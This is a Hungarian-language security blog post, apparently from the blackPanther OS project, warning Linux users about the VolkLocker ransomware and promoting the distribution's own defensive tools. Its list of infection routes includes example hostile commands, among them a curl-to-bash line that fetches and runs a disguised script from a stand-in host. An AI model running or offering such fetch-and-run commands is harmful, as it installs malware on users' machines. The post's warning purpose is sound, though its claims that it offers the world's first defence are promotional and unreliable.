Sok – főként teljesen kezdő – felhasználó kényelmesen hátradőlt abban a tévhitben, hogy a Linux alapú rendszerén micsoda biztonságot élvez, és még víruskeresőre sincs szüksége, mert nincsenek rá vírusok. Ahogy a korábbi cikkeinkben is leírtuk, ez több mint felelőtlenség, és saját magadat csapod be, ha így gondolod, miközben óriási veszélynek teszed ki magad! És most sajnos egy olyan hírt kell közölnöm amit soha nem akartál hallani:

A Golang nyelven írt, multiplatformos ransomware vírus új variánsa, a VolkLocker (nightmare) megérkezett, és terjed!

Mi az a VolkLocker ?

Egy RaaS (Ransomware-as-a-Service) típusú zsarolóprogram, amit a CyberVolk nevű hacktivista/cyberbűnöző csoport kínál támadóknak. Ez lehetővé teszi, hogy viszonylag kevés technikai tudással rendelkező bűnözők is ransomware támadásokat indítsanak (Igen, Linux/Windows is veszélyben van!). A kártevő nem igényel rendszergazdai jogokat ahhoz, hogy a felhasználói adatokat, képeket, dokumentumokat, adatbázisokat, stb.  zárolja!

Hogy működik?

A működés során parancs-vezérlést és irányítást Telegram botokon keresztül végez,  fájlokat titkosít — ez a ransomware kártevők szokásos viselkedése.

Titkosítási algoritmus:

• AES-256 GCM (Galois/Counter Mode) — egy modern, kriptográfiailag erős módszer. Strategic Focus
• Minden titkosított fájlhoz új inicializációs vektort (nonce) generál.

Elemzi a futtató környezetet

• Milyen platformon fut?
• Virtuális gépen vagy valós hardveren fut?
• Melyek a hálózati és fájlrendszeri jellemzők?
• Ez segíti abban, hogy megtalálja a „jobb” célpontokat vagy elkerülje a biztonsági elemző környezeteket
• Feltérképezi a fájlokat
• Eldönti, melyeket kell titkosítani (pl. dokumentumok, képek, adatbázisok)
• Minden file-t titkosít egyedi nonce-szal
• Hozzáad egy .locked vagy .cvolk kiterjesztést

Fontos tudni!

VolkLocker ransomware nem „önmagától” terjed, egy felelőtlen felhasználó kell hozzá — az áldozatnak kell befogadnia és elindítania a fertőzött programot!

Fő fertőzési pontok lehetnek

• Külső (idegen tárolókba elhelyezett) szoftrverek, DEB, RPM, bin, sh,
• Hamis parancsútmutatások, pl.:chmod +x alcaprogram && nohup alcaprogram >/dev/null &
• Flatpak, Snap, AppImage,
• Kéretlen e-mailek (social engineering)
• Hamis csatolmányok, amelyek elfedik a ransomware-t (pl. „Számla.pdf.bin” stb..).
• Hamis letöltési utasítások, pl.: bash < <(curl -sSL https://example.com/álcázott_program.sh)
• „Crack”, „keygen” vagy népszerű szoftver helyett malware.
• Gyakori torrentek, warez oldalak, hamis szoftverek.
• Ha Linuxon ilyen csomagot futtat a felhasználó, a ransomware is elindulhat

Bár ez a ransomware nem annyira kifinomult mint a Windows-os társai, de az tény, hogy működik, és fejlődni fog a jövőben! 

Ha blackPanther OS felhasználó vagy, biztos lehetsz benne, hogy mindent megteszünk a biztonságod érdekében, de jegyezd meg, a biztonsági mentés egy költséghatékony, és stressz mentes megoldás! Ha mást használsz, megszívtad, mert nincs rá semmilyen eszköze másnak, hogy megvédjen.

Védekezés

Az új VolkLocker, és korábbi ransomware támadási felületre, a világon elsőként létrehoztunk neked egy védelmi eszközt, amit ingyenesen használhatsz blackPanther OS-en!

RaaS Sentinel a ransomware őrszem – Linux/Windows

Bízom benne, hogy már tudod, hogy:

A blackPanther OS számos biztonsági eszközt kínál az adataid és a rendszered védelmére, melyeket előre beépítettünk az alaprendszerbe.

• Behatolásjelző, kezelő rendszer, interaktív tűzfallal
• Rendszerbiztonsági szint beállítása, ellenőzése
• Antibiotikum a Stealerium vírus ellen
• Shai-Hulud worm fertőzés vizsgálata
• AV-Hunter – Qt víruskereső
• Biztonsági mentés , helyreállítás

További hasznos információk és kapcsolódó cikkek

• Vírusok, vírusírtók
• Kiberbiztonsági téveszmék veszélyei – Windows/Android/Linux/Mac

Besorolva mint adat-biztonság, adatbiztonság, antivírus, biztonság, ransomware, vírus